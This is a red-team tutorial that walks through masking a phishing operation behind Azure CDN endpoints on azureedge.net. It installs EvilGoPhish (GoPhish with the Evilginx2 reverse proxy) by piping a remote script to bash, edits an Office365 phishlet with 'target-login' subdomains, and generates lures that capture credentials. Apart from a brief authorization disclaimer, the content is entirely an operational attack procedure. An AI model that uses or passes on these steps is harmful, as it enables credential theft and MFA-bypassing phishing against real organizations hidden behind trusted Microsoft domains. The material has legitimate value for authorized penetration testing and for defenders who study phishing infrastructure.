CDN Phishing

ther you stumbled across this post *by accident* or you need to create a good phishing campaign, I am here to help you with all that and a bag of chips!

This article aims to teach Offensive teams how to mask their phishing infrastructure using a Content Delivery Network (CDN) in Azure. The setup itself is very easy, but understanding how it works may be more convoluted. Let me walk you through the steps of creating a virtual machine in Azure to send out a phishing email.

Disclaimer

I shall not be responsible or liable for any misuse or illegitimate use of this guide. This guide is only to be used in authorized penetration testing or red team engagements where the operator(s) has(ve) been given explicit written permission to carry out social engineering.

A word of warning! This article is not an in-depth guide on how to:

  • Show you the detailed networking of a CDN.

  • Show you how Apache2 works.

  • Show you how TMUX works.

  • Show you how to set up a phishing campaign.

  • How to set up an SMTP relay (i.e. Mailgun).

Throughout this, if you have ANY questions, you can contact me on Discord. I am always active there.

Setting up a Virtual Machine

First things first, we want to setup a virtual machine in Azure. The reason why we use Azure is to get an SSL certificate from Let's Encrypt using:

certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com

Let's get started:

  1. Navigate to https://portal.azure.com and login.

  2. Go to Virtual Machines and create a Virtual Machine.

  1. Make sure to grab your SSH keys for this. Default user: azureuser

  2. Go to the resource you just created and click on where it says "Public IP Address" (it should be located in the "Essentials" section of the Resource)

  1. Once in there, add a DNS name label, should be something like "YOURDNSNAME.eastus.cloudapp.azure.com"

    1. Note this for later

  2. Ensure that port 80 (HTTP), 443 (HTTPS), and 587 (SMTP over StartTLS) are open by going to Virtual Machine just created > Networking > "Add inbound port rule"

  1. Lastly, let's access that virtual machine you just created!

  2. In a bash console (or PowerShell), SSH into the Virtual Machine you just created: ssh -L 3333:localhost:3333 azureuser@[ip-address] replacing [ip-address] with the IP Address of your virtual machine

  3. Start a tmux process tmux new

    1. If you are struggling with tmux usage, tmuxcheatsheet is a great resource.

Installing EvilGoPhish

Full credit for this section goes to Fin3ss3g0d for this beautiful tool! This tool automates the process of creating and making GoPhish, Evilginx2, and Apache flow together. Luckily for you, I've created a one-liner that happens to streamline this process and gives some nice prompts!

!!WARNING: THIS HAS ONLY BEEN TESTED ON DEBIAN AND UBUNTU IMAGES!!

My Bash One-Liner

Let's get started!

  1. First, when in the bash shell, run curl -sSL https://raw.githubusercontent.com/stevesec/egp_basicinstall/main/basic_install.sh | bash

    1. Make sure you are the root user! This script will automatically detect if you are in the sudoers group!

  2. Next, hit the "Enter" key through all of the prompt until you get to the "root domain" prompt, enter azureedge.net; we will be using this later!

  1. After the root domain prompt, enter your subdomains; please use the following (ensuring there is a space in between, replacing target with your target organization):

    1. target-login target-account

    2. Note these for later!

    3. Ensure that these both have "-login" and "-account" or this process will not work!

  1. Then, enter in your redirect URL (a good rule of thumb is you want to use it based on your targets infrastructure, i.e. Office365, or Google Account Login).

  1. Enter in the RID you want to use (this may be expanded on in the future), testing is required for Rule Engine implementation.

  1. The next couple of prompts are user's preference.

    1. Enabling the proxying for the root domain should be no as we do not own "azureedge.net".

    2. Enabling the Live Feed opens up a prompt on port 1337.

    3. Enabling the Apache Blacklist gives you a blacklist of all IP Addresses to reject from your web server.

  2. If you're satisfied with your "User Settings", click "Yes". If not, click "Edit Settings".

  1. If you want to use MailGun, I have included a prompt for setting that up, if not click "No"

  2. The setup process should begin and EvilGoPhish should be installed in /etc/.evilgophish/

Let's Encrypt Certificate

Remember that prompt for YOURDNSNAME.eastus.cloudapp.azure.com??? You're going to need it now!

  1. In the bash shell, type certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com, replacing YOURDNSNAME.eastus.cloudapp.azure.com with the one created above.

  2. Select 1 in the prompt which will spin up a temporary webserver

  1. Follow the prompts, making sure to agree with the Terms of Service

    1. If this prompt fails, check your listening ports: netstat -tulpn Apache2 might be running!

  1. If all goes well, you should a nice, shiny, new certificate from Let's Encrypt! Copy where the certificate is placed (usually in /etc/letsencrypt/live/[CertificateName]/)

Let's stick that in the enabled sites:

  1. Edit with your favorite text editor 😉 nano /etc/apache2/sites-enabled/000-default.conf and enter in your certificate where it says:

    1. SSLCertificateFile

    2. SSLCertificateChainFile

    3. SSLCertificateKeyFile

  1. If all goes well here, you should be able to type: systemctl restart apache2.service

    1. NOTE: Apache2 will be listening on IPv6 :::443, to change this edit: /etc/apache2/ports.conf and now it should be listening on IPv4 0.0.0.0:443

Setup CDN

Remember the subdomains you created with the bash one-liner? Let's grab those and get a move on with creating the CDN in Azure.

  1. Search for and go to Front Door and CDN Profiles and follow the prompts:

    1. Enter in to the "CDN Endpoint Name" your first subdomain (don't worry, we'll be adding the second one shortly)

    2. CDN Endpoint Name: target-login

    3. Origin Type: Custom Origin

    4. Origin hostname: IP Address of Virtual Machine

  1. Click "Review + Create"

  1. Go to the Resource that was just created.

  2. Click on it and click on "Origin"

  1. Click on where it states "origin-ip-address"

  1. Change the "Origin host header" to be the CDN Endpoint Name (i.e. target-login.azureedge.net)

  2. Click "Save"

  3. Navigate to "Compression", turn it off, and click "Save".

  1. Navigate to "Caching Rules", set it to "Bypass caching for query strings", and click "Save".

  1. Click on "+ Endpoint" to create a second endpoint.

    1. Enter in to the "CDN Endpoint Name" your second subdomain.

    2. CDN Endpoint Name: target-account

    3. Origin Type: Custom Origin

    4. Origin Hostname: IP Address of Virtual Machine

    5. Origin Host Header: CDN Endpoint Name (i.e. target-account.azureedge.net)

  1. Click on "Add".

  2. Follow steps 8 & 9 for your second CDN

Edit Evilginx Phishlet

We will now be editing the phishlets for Evilginx2. This will allow us to use the two subdomains we created.

  1. Edit with your favorite text editor 😉 nano /etc/.evilgophish/evilginx2/phishlets/o3652.yaml

  2. Under "proxy_hosts":

    1. Change "phish_sub: 'login'" to "phish_sub: 'target-login'", and

    2. Change "phish_sub: 'account'" to "phish_sub: 'target-account'"

Start Up EvilGoPhish

Lastly, we will be starting up EvilGoPhish. We will utilize Evilginx2 in developer mode as this mode gives us a self-signed certificate that can be used in conjunction with the SSL certificate we obtained from Let's Encrypt.

  1. From the /etc/.evilgophish/ directory, navigate to the gophish directory.

  2. Start GoPhish noting the admin password (this will need to be changed later)

    1. ./gophish

    2. This will start up the gophish.db to be used with Evilginx2

  1. Follow GoPhish Setup to setup an email campaign.

  2. Navigate back to the evilginx2 directory.

  3. Start Evilginx2:

    1. ./evilginx2 -g ../gophish/gophish.db -debug -developer -p phishlets/

    2. Ensure to ALWAYS use developer mode with a CDN in front.

    3. This will start up evilginx2 in developer mode, not requiring an SSL certificate

  1. Now, let's configure Evilginx2! Type in:

    1. config domain azureedge.net

    2. config ip [ip address of Virtual Machine]

    3. phishlets hostname o3652 azureedge.net

    4. phishlets enable o3652

    5. lures create o3652

    6. lures get-url 0

  1. With that URL, enter that into GoPhish and you should be ready to go!

  2. If everything worked out, you should now have a domain with azureedge.net that captures credentials

PreviousSteveSecNextWarhorse Configuration File

Last updated